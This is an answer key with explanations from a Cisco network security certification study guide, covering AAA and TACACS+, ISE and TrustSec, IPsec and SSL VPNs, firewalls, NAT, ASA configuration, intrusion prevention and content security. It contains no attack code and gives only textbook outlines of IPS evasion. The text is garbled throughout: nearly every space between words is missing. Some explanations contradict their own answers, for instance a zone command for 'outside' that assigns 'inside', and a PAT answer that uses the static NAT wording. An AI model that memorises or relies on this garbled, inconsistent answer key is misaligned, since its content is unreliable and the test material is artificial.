5. B.TheconfigurationwillapplyalllinesexceptfortheCon0.ThisgivesyouafallbackmethodtoaccesstheCLIifamisconfigurationofauthorizationlocksyouout.
6. B.TheCiscoSecureAccessControlServer(ACS)canoperateeitherasaRADIUSserverorasaTACACS+server.
7. D.WhilesomeCiscodevices,suchastheCiscoAdaptiveSecurityAppliance(ASA),cancommunicatedirectlywithLDAPrepositoriesorActiveDirectoryforauthenticationpurposes,mostdonot.
8. C.SpecifyanamefortheTACACS+server.Thisnamedoesnotneedtomatchtheactualnameoftheserverandisonlylocallysignificant.Whenyouexecutethiscommand,thepromptwillchangeattheensuingpromptwhereyouwillentertheIPaddressandtypeandthesharedsecret.
9. A.ThiscanbedonebyusingthetestcommandtotestanauthenticationusingtheTACACS+server.Forexample,totesttheusernamemytestwithapasswordofmypass,usethefollowingcommand:R99(config)#testaaagrouptacacsmytestmypassnew-code
Sendingpassword
Usersuccessfullyauthenticated
USERATTRIBUTES
Username0"mytest"
Reply-message0"Password:"
10. B.TospecifytheuseofTACACS+inthemethodlistforauthorizationwhilealsospecifyingabackupmethod,usethefollowingcommand:
aaaauthorizationexecdefaultgrouptacacs+local
Inthiscase,thebackupislocalauthentication.
11. C.Enablingper-commandauthorizationisoptionaltotheprocess.
12. B.TheTACACS+serverconsultstheLDAPserver,theLDAPserverperformsauthentication,andtheAAAserverpassestheresulttothesupplicant.
13. B.Postureassessmentistheabilitytoverifytheminimumsecurityrequirementsofadevicebeforeallowingaccess.IfissuesarisesuchasmissingOSorsecurityupdates,thedevicemaybeeitherremediatedordeniedentry.
14. B.ThiscommandprovidesaccesstotheCLI(byincludingtheexeckeyword)onalllines(byaddingthedefaultkeyword).
15. A.Thiscommandcreatesauseraccountnamedadminsrthathasaprivilegelevelof7withanencrypted(secret)passwordofsrpass.
16. B.Controllingtheactivitiesofthosewithadministrativeaccessbyusinguseraccountsratherthanprivilegelevelsprovidesmoreaccountability.
17. C.WhileTACACS+supportsCiscocommands,RADIUSdoesnot.
18. C.802.1xisastandardthatdefinesaframeworkforcentralizedport-basedauthentication.Itcanbeappliedtobothwirelessandwirednetworksandusesthreecomponents.
Supplicant:Theuserordevicerequestingaccesstothenetwork
Authenticator:Thedevicethroughwhichthesupplicantisattemptingtoaccessthenetwork
Authenticationserver:Thecentralizeddevicethatperformsauthentication
19. A.TheroleoftheauthenticationservercanbeperformedbyaRemoteAuthenticationDial-inUserService(RADIUS)orTerminalAccessControllerAccessControlSystem+(TACACS+)server.
20. B.Profilingistheabilitytodeterminethetypeofdevicefromwhichanetworkaccessrequestisoriginatingandtoapplyasetofaccesspoliciesspecifictotheprofileattachedtothatdevice.Thismeansausermighthavemultipleprofileseachattachedtothevariousdevicestheyuse.
Chapter10:SecuringaBYODInitiative1. C.TheCiscoIntegratedServicesEngine(ISE)isacentralizedidentity-basedpolicy
platformthatprovidescontext-basedaccesscontrolforwired,wireless,andVPNconnections.ItcombinesAAA,postureassessmentandprofiling,andguestaccessmanagement.
2. A.Thefollowingcanbeconsideredduringboththeaccessrequestandthefollowingauthorizationrequest:
Whoistheindividual?
Whatdevicearetheyusing?
Wherearetheyconnectingfrom?
Whenaretheyconnecting?
Howaretheyconnecting?
3. A.TheISEcanmakeuseofseveraladvancedfeaturestoprovidegranularanddynamicaccesscontrolpolicies.AmongthesearedownloadableACLs(dACLs),whichareIP-basedACLsthatareimplementedondeviceswhenthepolicycallsforit.
4. B.Securitygroupaccess(SGAs)appliesasecuritygrouptag(SGT)thatuniformlyenforcesthesecuritygrouppolicyregardlessoftopology.
5. C.Changeofauthorization(COA)updatesprovidetheabilityofISEtochangetheauthorizationpolicyinrealtimeaftertheadministratormakesachangewithoutrequiringalog-offforthechangetotakeeffect.
6. D.Postureassessmentcancheckthehealthofadevicebeforeallowingaccessand,ifthecheckfails,canremediatethedevice.
7. A.Webauthentication(WebAuth)enablesnetworkaccessforendhoststhatdonotsupportIEEE802.1xauthentication.
8. C.ThethreemainfunctionsofTrustSecaretoclassifyeachdevicebyassigningasecuritygrouptag(SGT)toitsIPaddress,totransportorcommunicatethisclassificationinformationthroughoutthenetworkusingaprocesscalledinlinetagging(forthosenetworkingdevicesthatsupportinlinetagging)orusingtheSGTeXchangeProtocol(SXP)forthosenetworkingdevicesthatdonot,andtoenforceaccessrulesthroughtheexaminationoftheSGTs.
9. B.ClassificationofadeviceisdonethroughtheapplicationofanSGT.Thesetags,16bitsinlength,canbeapplieddynamicallyorstatically.
10. A.Transportationorcommunicationofthisclassificationinformationthroughoutthenetworkusesaprocesscalledinlinetagging(fornetworkingdevicesthatsupportinlinetagging)orusingtheSGTeXchangeProtocol(SXP)forthosenetworkingdevicesthatdonot.
11. A.Dynamictaggingispossiblewhentheauthenticationmethodis802.1x,MACbypass,orthroughwebauthentication.Indynamictagging,theISEpushestheSGTtothenetworkaccessdevice(NAD).
12. A.TheSGTwillbeinanewsectionoftheEthernetheadercalledtheCiscoMetadata(CMD)header.
13. C.TheCMDholdsotherinformationbesidestheSGT.Overall,thisadds20bytestothesizeoftheheader.
14. D.Onethingtonoteisthatincaseswheretwonetworkingdevicesarealsousing802.1aesecurity(MACSec),theadditionofthe802.1aeheaderandICVfieldwillresultinatotaladditiontotheEthernetheaderof40bytes.
15. A.SXPconnectionsarepoint-to-pointTCP-basedconnectionscreatedbetweentwoendpoints;onemustbedesignatedasthespeakerandtheotherasthelistener(anyothercombinationofthetworoleswillfail).
16. C.Version1onlysupportsIPv4bindingpropagation.Version2supportsbothIPv4andIPv6bindingpropagation.Version3addedsupportforsubnettoSGTmappings.Ifspeakingtoalower-versionlistener,thespeakerwillexpandthesubnet.Version4addedloopdetectionandprevention,capabilityexchange,andabuilt-inkeep-alivemechanism.
17. A.TheCiscoAdaptiveSecurityApplianceandseveralotherroutingplatformsuseadifferentmethodtoenforceTrustSec.WhileISEmanagesSGACLscentrally,thesedevicesareconfiguredindividuallywithACLsthatreferencetheSGTnumbersorsecuritygroupnames.ThisiscalledSecurityGroupFirewall(SGFW).
18. A.Mobiledevicemanagementsoftwareisdesignedtomakeitpossibletoexertcontroloverpersonalmobiledevicesthatuserswanttouseontheenterprisenetwork.WhenusedinconjunctionwithISE,thecombinationcanbeapowerfulandsecureidentityandauthenticationsolutionforbothcompany-ownedandnon-company-owneddevices.
19. A.InthecontextofaBYODarchitecture,theISEwhenworkingincombinationwithmobilemanagementtiestogethertheprovisioningofmobiledevicesalongwithahealthcheckofthedeviceateachconnectionrequest.
20. B.OneofthethreemainfunctionsofTrustSecistheenforcementofaccessrulesthroughtheexaminationoftheSGTs.
Chapter11:UnderstandingVPNs1. C.WhenthechoiceismadetouseESP,oneoftheprotocolsinthesuite,attheleastthe
datapayloadwillbeencrypted,anddependingonthedeliverymode,theentirepacketincludingtheheadermaybeencrypted.
2. A.Itdoesthisbyusingthehashingalgorithmyouselectduringimplementation.Thisishash-basedmessageauthentication(HMAC).
3. B.WhenconfidentialityofanIPsecconnectionisnotrequired,theAuthenticationHeaders(AH)protocolcanbeused.Whileitdoesprovidedataintegrityandoriginauthenticationandanti-replayprotection,thedataissentincleartext.
4. C.ThekeymanagementprocessinIPsecprovidesforthedynamicgenerationofkeystobeusedforencryptionandfortheirsecureexchangeoveranuntrustednetwork,suchastheInternet.TheDiffie-Hellmankeyexchangealgorithmisused,andanasymmetricalgorithmisusedtocreateandexchangesymmetrickeysforthisprocess.
5. C.In2005,theNSAidentifiedasetofcryptographicalgorithmsthatarethepreferredmethodforsecuringinformation.ItcalledthesealgorithmsSuiteB.Thesealgorithmsuseaminimumkeylengthofatleast128bits.
6. C.SuiteBcryptographyusesthefollowingalgorithms:
AESencryptionwitheither128-or256-bitkeys
SHA-2hashing
EllipticalCurvedigitalsignaturealgorithm(ECDSA)fordigitalsignaturesusing256-bitand384-bitprimemoduli
KeyexchangeusingEllipticCurveDiffie-HellmanExchange(ECDHE)
7. C.ThekeyexchangeisperformedbytheDiffie-Hellmanalgorithm.
8. D.TheIPsectransformsetisnegotiatedinphase2ofIKE.
9. B.Mainmodeconsistsofthreeexchanges.
Peersnegotiatetheencryptionandhashingalgorithmstobeused.
TheDiffie-Hellmanprotocolisusedtogenerateasharedsymmetrickey.
TheSAisbuilt,andthenthepeersauthenticateoneanotherwithintheSA.
10. D.TheDiffie-HellmanprotocolisusedtogenerateasharedsymmetrickeyintheMainmodeofphase1.
11. A.IKEv2hasfewertransactions;thisresultsinincreasedspeed.
12. B.WhenAHisusedintransportmode,onlythepayloadisauthenticated.
13. C.WhenESPisusedintunnelmode,theentirepacketisencrypted,andanewIPheaderisadded.
14. A.WhiletheuseofIPsecisnotrequiredwhenusingIPv6,theIPv6packetstructurewasredesignedtoaccommodateitsuse.
15. A.WhenusingaremoteaccessVPN,therearetwodefaultbehaviorsthatcancauseissues.Thetwobehaviorsareasfollows:
Onceatunnelisoperational,alltrafficleavingtheVPNclientmustpassthroughthetunnel.
Bydefault,anASAwillnotforwardpacketsbackoutthesameinterfaceinwhichitwasreceived.
16. B.Tosolvethisissue,youmustenableanoptioncalledEnableTrafficBetweenTwoOrMoreHostsConnectedToTheSameInterface.Thisiscommonlyreferredtoashairpinning.ThisoptionisfoundbynavigatingintheASDMtoConfiguration DeviceSetup Interfaces.
17. C.Anotheradvancedoptionyoucanenableiscalledsplittunneling,andwhenenabled,itallowsausertohavethetunnelupandusethesameinterfacetoaccesstheInternetwithouttraversingthetunnel.Whenthisisdone,anACLisusedtodeterminethetrafficthatgoesthroughthetunnel(alltrafficexceptforInternet)andthetrafficthatdoesnotgothroughthetunnel(Internet).
18. B.ToenableAlways-On,youmustfirstenableTrustedNetworkDetectioninaprofilethatappliestotheuser.ThisfeatureenablesthedevicetoknowwhenitisconnectedtothecorporateLANandwhenitisnot.
19. A.AsESPdoesnotutilizetheconceptofsourceanddestinationports,NAThasdifficultyoperatingwhenIPsectrafficarrivesattheNATdevice.NATtraversalencapsulatesIPsecwithinUDP,providingtherequisiteportsforNAT.
20. C.InIPv6,extensionheadersareused.Theseheaders,whenused,comeaftertheoriginalIPv6header.ThenextheaderfieldintheoriginalIPv6headerisusedtoindicatewhethertheextensionheaderisAHorESP.Itusestheprotocolvalueof50forESPand51forAH.
Chapter12:ConfiguringVPNs1. A.Thesupportedalgorithmsare3DES,IDEA,RC4,andAES.
2. A.AnSSL/TLSVPNcanuseRSA,DSA,andECCforauthentication.
3. A.Thestepsareasfollows:
1. TheclientinitiatestheprocessbystartingtheexchangeofhellopacketsbetweentheclientandtheVPNgateway(theASA).
2. Theservertransmitsitscertificatetotheclient(whichwillincludeitspublickey).
3. Ifmutualauthenticationisrequired,theclientsendsitscertificatetotheserver.
4. Sessionkeysareexchanged,andthedatatransferbegins.
4. D.Configuringuserauthenticationcomprisesthreesubtasks:creatingaccountsfortheVPNusers,configuringagrouppolicyfortheVPNusersspecifyinginthepolicyclientlessSSLVPNasthetunnelingprotocol,andcreatingaconnectionprofilefortheVPNusersandconnectingthepolicytotheprofile.
5. A.TheISEmoduleperformsaclient-sideassessment.
6. C.DefiningtheIPsectransformsetincludesspecifyingtheencryptionandintegrityalgorithms.
7. C.Thegroup5commandspecifies1024-bitDiffie-Hellmanforkeyexchange.
8. A.Thenumber10referstothesequencenumberofthelineinthecryptomap.Thenameofthemapismymap.
9. B.Whilecertificatescanbedeployedonboththeclientandtheservertoenablemutualauthentication,inmostcasesacertificateisdeployedonlyontheserverbecausethatcansecuretheconnectionaswellaswhencertificatesaredeployedonbothends.
10. B.ThepossibleauthenticationmechanismsavailableareDSA,ECC,andRSA.
11. D.Inthesecondstep,theservertransmitsitscertificatetotheclient(whichwillincludeitspublickey).
12. B.Oncethesessionkeysareexchanged,thedatatransferbegins.WhenthetrafficgetsbeyondtheASA,theinformationwillbeincleartextbutwillbeencryptedbetweentheclientandtheASA.
13. B.WhenusingtheCiscoclientlessSSLVPN,theremotedeviceusesthebrowsertoconnecttoanSSL-enabledwebsiteontheASAoronaCiscorouter.
14. B.MD5isoneofthreeintegrityalgorithmsthatcanbeused,includingSHA1andSHA2.
15. B.AcryptoACLdefinesthetraffictypestobesentandprotectedthroughthetunnel.
16. B.Itdefinesasecurityassociationlifetimeof1day(86400seconds).
17. A.AES_SHAisthenameofthetransformset.ThemechanismforpayloadauthenticationisESPHMAC.ThemechanismforpayloadencryptionisESP,andtheIPsecmodeistunnel(defaultstotunnel).
18. B.ThekeyexchangemanagementalgorithmsavailableinanSSLVPNareDH,DSS,andRSA.
19. B.ToutilizeaCiscoAnyConnectSSLVPN,aVPNclientcalledtheAnyConnectclientmustbeinstalledontheuserdevice.
20. B.RemediationwiththeASAmodule,nottheISEmodule,islimitedtoworkingwiththesoftwarepresentontheendpoint,meaningitcanenable,disable,orupdatethatsoftware.
Chapter13:UnderstandingFirewalls1. C.Packetfilteringfirewallsaretheleastdetrimentaltothroughputbecausetheyonly
inspecttheheaderofthepacketforallowedIPaddressesorportnumbers.
2. A.Circuit-levelproxiesoperateattheSessionlayer(layer5)oftheOSImodel.TheymakedecisionsbasedontheprotocolheaderandSessionlayerinformation.
3. B.Akernelproxyfirewallisanexampleofafifth-generationfirewall.ItinspectsthepacketateverylayeroftheOSImodelbutdoesnotintroducetheperformancehitthatanApplicationlayerfirewallwillbecauseitdoesthisatthekernellayer.
4. D.Applicationfirewallsoperateattheapplicationlayerandarenotconsideredproxyfirewalls.
5. A.PersonalfirewallseithermaybethosethatcomewithanoperatingsystemliketheWindowsFirewallormaybethird-partyhostfirewallssuchasKasperskyInternetSecurityorZoneAlarmProFirewall.Thesefirewallsarecalledeitherhostorpersonalfirewallsandprotectonlythedeviceonwhichthesoftwareisinstalled.
6. A.Thecontentsofthestatetableincludethefollowingforeachconnection:sourceIPaddress,sourceportnumber,destinationIPaddress,destinationportnumber,IPprotocol,flags,andtimeout.
7. B.Application-levelproxiesperformdeeppacketinspection.Operatingatthislayerrequireseachpackettobecompletelyopenedandclosed,makingthisfirewallthemostimpactfulonperformance.
8. C.Proxyserverscanprovideanadditionalbeneficialfunctioncalledwebcaching.Whenaproxyserverisconfiguredtoprovidewebcaching,itsavesacopyofallwebpagesthathavebeendeliveredtointernalcomputersinawebcache.Ifanyuserrequeststhesamepagelater,theproxyserverhasalocalcopyandneednotspendthetimeandefforttoretrieveitfromtheInternet.Thisgreatlyimproveswebperformanceforfrequentlyrequestedpages.
9. D.Circuit-levelproxiesoperateattheSessionlayer(layer5)oftheOSImodel.TheymakedecisionsbasedontheprotocolheaderandSessionlayerinformation.
10. A.Althoughpacketfilteringfirewallsserveanimportantfunction,theycannotpreventmanyattacktypes.TheycannotpreventIPspoofing,attacksthatarespecifictoanapplication,attacksthatdependonpacketfragmentation,orattacksthattakeadvantageoftheTCPhandshake.
11. B.Anapplication-levelfirewallmaintainsadifferentproxyfunctionforeachprotocol.Forexample,forHTTPtheproxywillbeabletoreadandfiltertrafficbasedonspecificHTTPcommands.
12. C.ApacketshouldneverarriveatafirewallfordeliverythathasboththeSYNflagandtheACKflagsetunlessitispartofanexistinghandshakeprocess,anditshouldbein
responsetoapacketsentfrominsidethenetworkwiththeSYNflagset.
13. D.Thefirewallrecordsalloperationsinitsstatetableandwillmonitorthattablewheneverapacketarrivesatthefirewalltoensurethatanypacketspermittedeitherareconnectionrequestsfromtheinside(SYNpacketsonly)orarepartofanexistingconnectionandthatallrulesofthehandshakeareenforced.
14. A.Whileneverareplacementforproperlypositionednetworkfirewalls,personalfirewallsareanexcellentcomplementtotheprotectionprovidedbythenetworkfirewalls,andinstallingbothtypesoffirewallsisanexampleofexercisingtheconceptofdefenseindepth.Thisconceptprescribesthatyoualwaysdeploymultiplebarrierstounauthorizedaccess.
15. B.ASOCKSfirewallisanexampleofacircuit-levelfirewall.ThisrequiresaSOCKSclientonthecomputers.ManyvendorshaveintegratedtheirsoftwarewithSOCKStomakeusingthistypeoffirewalleasier.
16. B.ASYN/ACKpacketinresponsetoaSYNpacketinacurrentconnectionsetupisnormalandwouldbeallowed.
17. C.ProxyfirewallsincludeSOCKSfirewalls,circuit-levelfirewalls,andkernel-levelfirewalls.
18. D.Whileneverareplacementforproperlypositionednetworkfirewalls,theyareanexcellentcomplementtotheprotectionprovidedbythenetworkfirewalls,andinstallingbothtypesoffirewallsisanexampleofexercisingtheconceptofdefenseindepth.
19. A.OperatingattheApplicationlayerrequireseachpackettobecompletelyopenedandclosed,makingthisfirewallthemostimpactfulonperformance.
20. B.PacketfilteringfirewallsinspecttheheaderofthepacketforallowedIPaddressesorportnumbers.SincethesevaluesresideattheNetworkandTransportlayers,respectively,thesefirewallsoperateatthoselayers.
Chapter14:ConfiguringNATandZone-BasedFirewalls1. B.InstaticNAT,eachprivateIPaddressismappedtoapublicIPaddress.Whilethisdoes
notsaveanyofthepublicIPv4addressspace,itdoeshavethebenefitofhidingyourinternalnetworkaddressschemefromtheoutsideworld.
2. D.TheManualNATAfterAutoNATisreadlastandcontainsmoregeneraltranslationsnothandledbythefirsttwosections.Theseareusedonlywhennotranslationmatchesinthefirsttwosections.
3. D.Insomescenarios,youmayneedmoreoptionsthanareavailablewithAutoNAT,oryoumayneedtospecifyexceptionstotheAutoNATrules.ByusingtheManualNATsection,theseoptionswillbeavailabletoyou.
4. C.TheshowxlatecommandonanASAshowsthetranslationsthathaveoccurred.
5. C.TherflagindicatesthatthetranslationisaPAT.Theiflagindicatesthatthetranslationappliestotheinsideaddressport.
6. B.Zonesarecollectionsofnetworksreachableoverarouterinterface.
7. D.AmatchstatementisusedtospecifythetrafficandcanmatchtrafficbasedonanACL,protocol,oranotherclassmap.
8. C.Theactionscanbedefinedusingactionstatements.Theactionscanbeinspect(triggersstatefulpacketinspection),drop(deniestraffic),orpass(permitstraffic).
9. B.Theself-zoneisaspecialzonethathasnointerfacemembers.Itappliestoanytrafficdestinedfortherouterratherthantrafficthattherouterisrouting.
10. C.InPAT,eachprivateIPaddressismappedtoapublicIPaddress.WhilethisdoesnotsaveanyofthepublicIPv4addressspace,itdoeshavethebenefitofhidingyourinternalnetworkaddressschemefromtheoutsideworld.
11. C.Thevalue21505isthesourceportnumberselectedbythedeviceat10.1.1.15fortheICMPsession.
12. D.WhenusingtheCiscoCommonClassificationPolicyLanguage,classmapsareusedtodefinetrafficclasses.
13. B.Usethefollowingcommandstocreatethezonecalledinside.RTR64(config)#zonesecurityinside
14. C.Theself-zoneisaspecialzonethathasnointerfacemembers.Itappliestoanytrafficdestinedfortherouterratherthantrafficthattherouterisrouting.AnexampleofthistypeoftrafficwouldbetraffictomanagethedeviceusingSSH.Italsoappliestotrafficgeneratedbytherouter.ThetrafficgoingfromtherouterbacktothedevicemakingtheSSHconnectiontomanagethedevicewouldbeanexampleofsuchrouter-generatedtraffic.
15. A.Appliedattheinterfaceconfigurationprompt,thecommandtoassignaninterfacetotheoutsidezoneisasfollows:
RTR64(config-if)#zone-memberinside
16. C.WhenusingtheCiscoCommonClassificationPolicyLanguage,classmapsareusedtodefinetrafficclasses,andpolicymapsareusedtoapplypolicies(actions)tothesetrafficclasses.
17. A.Zonepairsareusedtodefineaunidirectionalfirewallpolicy.Thedirectionisindicatedbyspecifyingthesourceanddestinationzone.
18. A.TherflagindicatesthatthetranslationisaPAT.Theiflagindicatesthatthetranslationappliestotheinsideaddressport.
19. A.Inthissection,alsocalledobjectNAT,translationsthataredefinedontheobjectitselfarecontained.Thesetranslations,oneforeachobject,aretypicallyeitherstatictranslationsforserversthatmustbereachedfromtheoutsideworld(andrequirethesamepublicIPaddressalways)ordynamictranslationsforclientstryingtoreachtheInternet.
20. A.IndynamicNAT,apoolofpublicIPaddressesisobtainedthatisatleastequaltothenumberofprivateIPaddressesthatrequiretranslation.However,ratherthanmappingtheprivateIPaddressestothepublicIPaddresses,theNATdevicemapsthepublicIPaddressesfromthepoolonadynamicbasismuchlikeaDHCPserverdoeswhenassigningIPaddresses.
Chapter15:ConfiguringtheFirewallonanASA1. A.ApplicationInspectionControl(AIC)orapplicationprotocolcontrolasitisalsocalled
verifiestheconformanceofmajorapplicationlayerprotocolsoperationstoRFCstandards.
2. B.Intransparentmode,theASAisnotactingasarouterandassumesalayer2identitymuchasaswitchdoes.ThismakestheASAtransparenttodevicesoneitherside(fromalayer3perspective);thusthenametransparentmode.
3. C.InClustering,threeormoresecurityappliancesaredeployedasasinglelogicaldevice.ThisallowsforthemanagementofthemultipleASAsasaunit.Itprovidesincreasedthroughputandredundancy.
4. A.TheASAcanbepartitionedintomultiplevirtualfirewallsorsecuritycontexts.Eachcontextcanhaveitsowninterfaces,policies,andadministrators.
5. B.Thenameifcommandisusedattheinterfaceconfigurationprompt.
6. C.ThehttpserverenablecommandisrequiredtostarttheHTTPserviceontheASA.
7. D.ThecommandhttpipaddressmaskinterfaceisusedtodefineanIPaddressonthespecifiednetworkthatwillbeallowedtoconnecttotheASAusingHTTPtomanagetheASA.
8. A.Securitylevelsdefinethetrustworthinessoftheinterface.Thehigherthelevelthemoretrustedtheinterface.
9. B.Thereisanimplicitpermitfortrafficflowingfromahigh-securityinterfacetoalow-securityinterface.Highandlowaredefinedbythesecurityvalueassigned.
10. C.Thecommandsecurity-levelvalueisusedattheinterfaceconfigurationprompt.
11. A.Youwillneedtocreateanaccessruletoallowtrafficineachofthefollowingscenarios:betweeninterfacesofthesamesecuritylevel,andtrafficfromalower-securityinterfacetoahigher-securityinterface.
12. B.Inmanycasesweneedtoallowonlyaselectgroupofdevicesratherthanalldevices,orweneedonlyallowdevicesonaspecificnetworktosendtrafficonaninterfacewhentherearemultiplenetworksthatmightbetraversingthatinterface.Tomakethecreationandapplicationofruleseasier,theASAcanalsouseanobject-basedmodelforcertainrules.
13. D.IntheCiscoModularPolicyFramework,class-mapsareusedtocategorizetraffictypesintoclasses.
14. A.OntheServicePolicyrulepage,theGlobalradiobuttonappliesthepolicytoallinterfaces.
15. B.Youwillneedtocreateanetworkobjecttorepresentthe192.168.5.0/24network,createaserviceobjecttorepresentHTTP,andcreateahostobjecttorepresenttheserverat201.3.3.3.
16. C.IntheCiscoModularPolicyFramework,servicepoliciesareusedtospecifywherethepolicymapshouldbeimplemented.
17. B.Sinceoutsidehasasecuritylevelof0andthedmzhasalevelof50,trafficfromthelowerlevel(0)tothehigherlevel(50)willbedisallowed.
18. C.ThecommanddefinesanIPaddressontheinsidenetwork(definedbytheinterfacename)thatwillbeallowedtoconnecttotheASAusingeitherSSHorHTTPtomanagetheASA.
19. C.IntheCiscoModularPolicyFramework,policymapsareusedtodefinetheactiontobetakenforaclass.Actionsthatcanbespecifiedareallow,blockandrate-limit.
20. D.Thereisanimplicitdenyfortrafficflowingfromalow-securityinterfacetoahigh-securityinterface.Highandlowaredefinedbythesecurityvalueassigned.
Chapter16:IntrusionPrevention1. A.Athreatisanidentifiedsecurityweaknesstowhichanyspecificenvironmentmayor
maynotbevulnerable.Forexample,athreatmightexistintheformofanewattackonOracledatabaseservers,butifyouuseMicrosoftSQLServer,itisathreattowhichyouarenotvulnerable.
2. A.Actionsrefertotheoperationsanintrusionpreventionsystem(IPS)cantakewhenanattackisrecognizedtoblockthetraffic.DropsmeanstheIPSquietlydropsthepacketsinvolved.
3. C.Theabilitytomonitoranyinternalactivitythatoccurswithinasystem,suchasanattackagainstasystemthatiscarriedoutbyloggingontothesystem’slocalterminal,isastrengthofhost-basedIPSandaweaknessofnetwork-basedIPS.
4. A.TheattackfragmentsthepacketcontainingthemaliciouscodesothatitbecomesdifficultfortheIPStorecognizethecodeinsuchafragmentedfashion.
5. D.TherearefourcategoriesoffunctionsofwhichFireSIGHTiscapable.Theyincludedetection,learning,adapting,andacting.Blockingisaformofacting.
6. A.Azero-daythreatisanythreatnotyetremediatedbymalwarevendorsorsoftwarevendors.Thistypeofthreatcannotbedetectedthroughattacksignature-basedmethodsandisusuallyonlydiscoveredbymalwareorIPS/IDSsoftwarethatusesheuristics.
7. B.CiscoAMPforEndpointsiscomposedofconnectorsinstalledonendpoints.Itusesacloud-baseddetectionprocessthatoffloadsthedetectionburdentothecloud.CiscoAMPforNetworksusesFirePOWERappliancestodetectmalwareintransit.
8. A.ThesensorisconnectedtoaportontheswitchtowhichalltraffichasbeenmirroredbymakingtheportaSPANport.
9. C.Manyprotocols’informationcanbecommunicatedorexpressedinmultipleways.Forexample,HTTPcanacceptstringsexpressedinhexadecimal,Unicode,orstandardtextexpressions.AttackerscanusethistoevadeanIPSsensor.IftheIPScannotperformprotocolnormalization(decodingthepayloadtodiscoveritssignificance),thisattackmaysucceed.
10. C.Avulnerabilityisanysusceptibilitytoanexternalthreatthatadeviceorsystemmaypossess.Athreatonlybecomesavulnerabilitywhenthethreattargetispresentinyourenvironmentandisinthestaterequiredtotakeadvantageofthevulnerability.
11. C.Actionsrefertotheoperationsanintrusionpreventionsystem(IPS)cantakewhenanattackisrecognized.ShunsendsapacketwiththeRSTflagwhenanon-TCPconnectionisencountered.
12. C.Inthismode,thesensingdeviceisplacedinthelineoftrafficandanalyzestheoriginaltraffic,notacopyinrealtime.Therefore,itcantakeactionsonthetraffic,allowingittooperateasatrueIPS.
13. A.Oneoftheoptionsistoplacethesensoroutsidetheperimeterfirewall(ASA).Whenplacedhere,thesensorwillgenerateaveryhighnumberofalarmsbecausethisisanexposuretothemostuntrustednetwork,theInternet.
14. D.Anexploitoccurswhenathreatandvulnerabilitybothexistandathreatactortakesadvantageofthesituation.Thetermexploitalsoreferstothespecifictoolorattackmethodologyused.
15. D.Actionsrefertotheoperationsanintrusionpreventionsystem(IPS)cantakewhenanattackisrecognized.Whenblocking,theIPSdirectsanotherdevice(arouterorfirewall)toblockthetraffic.
16. B.Thetapisplacedbetweentherouterandthelayer3switch.Itprovidesfull-duplexconnectivitybetweenthedevicesandsplitsofftwosimplexmirrorsofthefull-duplextraffic.Alltrafficbetweenthetwodevicesmusttraversethesensor.
17. A.Theattackerinjectsabogusstringintotheattackcodeandbreakstheattackintofragments.ThenhemanipulatestheTTLvalueofthefragmentcontainingthebogusstringinsuchawaythatthefragmentdies(andnevergetsdelivered)beforeitreachesthedestination.IftheIPSdoesnotconsiderthefragmentoffsetvaluesorTTLvalues,itwilldetectthebogusstringratherthantheactualpayload.TheresultisthatafterinspectionbytheIPS,thebogusstringdoesnotgetdelivered;theattackpayloaddoes.
18. C.Theinabilitytomonitoranyinternalactivitythatoccurswithinasystem,suchasanattackagainstasystemthatiscarriedoutbyloggingontothesystem’slocalterminal,isastrengthofhost-basedIPSandaweaknessofnetwork-basedIPS.
19. B.Actionsrefertotheoperationsanintrusionpreventionsystem(IPS)cantakewhenanattackisrecognized.ResetsendsapacketwiththeRSTflagthatendsanyTCPconnection.
20. B.Ariskiscreatedwhenathreatexiststowhichasystemisvulnerable.
Chapter17:ContentandEndpointSecurity1. B.Reputation-basedfilteringreliesontheidentificationofemailserversthathavebecome
knownforsendingspam.Whenasystemcandothis,itmustrelyonsomeservicefordevelopingthese“reputations.”
2. A.Dataleakageoccurswhensensitivedataisdisclosedtounauthorizedpersonneleitherintentionallyorinadvertently.Datalossprevention(DLP)softwareattemptstopreventdataleakage.
3. B.NetworkDLPisinstalledatnetworkegresspointsneartheperimeter,whereitanalyzesnetworktraffic.
4. A.Precisemethodsinvolvecontentregistrationandtriggeralmostzerofalse-positiveincidents.
5. A.Ifthesenderscoreisbetween−1and+10,theemailisaccepted.Ifitisbetween−1and−3,theemailisaccepted,butadditionalemailsarethrottled.Ifitisbetween−10and−3,itisblocked.
6. A.AdvancedMalwareProtection(AMP)isthemalwarecomponentinESAthatusesacombinationofseveraltechnologiestoprotectyoufromemail-basedmalware.
7. A.FilereputationsendsafingerprintofeveryfilethattraversestheCiscoemailsecuritygatewaytoAMP’scloud-basedintelligencenetworkforareputationverdict.Basedontheseresults,youcanblockmaliciousfilesidentifiedashavingabadreputation.
8. B.TheCiscoWebReputationSystem(WBRS)usesreal-timeanalysisonavast,diverse,andglobaldatasettodetectURLsthatcontainsomeformofmalware.WBRSisacriticalpartoftheCiscosecuritydatabase,whichprotectscustomersfromblendedthreatsfromemailorwebtraffic.
9. C.TheCiscoWebSecurityAppliance(WSA)isawebproxythatintegrateswithothernetworkcomponentstomonitorandcontroloutboundrequestsforwebcontent.TrafficcanbedirectedtotheWSAexplicitlyontheendhostorbyusingtheWebCacheControlProtocolonaninlinedeviceliketheperimeterrouter.
10. A.ByleveragingCiscoSecurityIntelligenceOperations(SIO),CiscoIronportreputationfiltersanalyzemorethan50webandnetworkparameterstoevaluateawebsite’strustworthiness.
11. C.Ifthesenderscoreisbetween−1and+10,theemailisaccepted.Ifitisbetween−1and−3,theemailisaccepted,butadditionalemailsarethrottled.Ifitisbetween−10and−3,itisblocked.
12. C.Inthesafesandboxedenvironment,AMPcanobtaindetailsaboutthethreatlevelofthemalwareandcommunicatethatinformationtotheCiscoTalosintelligencenetworktoupdatetheAMPclouddataforall.
13. C.TheWSAanti-malwaresystemusesmultiplescanningenginesinasingleappliance.
ItusestheDynamicVectoringandStreamingEngineandverdictenginesfrombothWebRootandMcAfee.
14. D.WSAusesApplicationVisibilityandControl(AVC)toallowforthecontroloftheuseofwebapplications.GranularpolicycontrolallowsadministratorstopermittheuseofapplicationssuchasDropboxorFacebookwhileblockingusersfromactivitiessuchasuploadingdocumentsorclickingtheLikebutton.
15. B.ThemaintaskofCiscoISEistomanageaccesstothenetwork,butitsabilitiesgobeyondthat.ItcanprovideAAAservicessothatyoucandeploy802.1xsecurity.UsingCiscoTrustSectechnology,italsocanenforceendpointsecuritypoliciesthatensurethatmanyofthesecuritymeasuresinthissectionarecompliantwiththepolicy.
16. B.Fileretrospectionallowsfortheidentificationandremovalofthesefileslater.Ifmaliciousbehaviorisspottedlater,AMPsendsaretrospectivealertsothatyoucancontainandremediatethemalware.
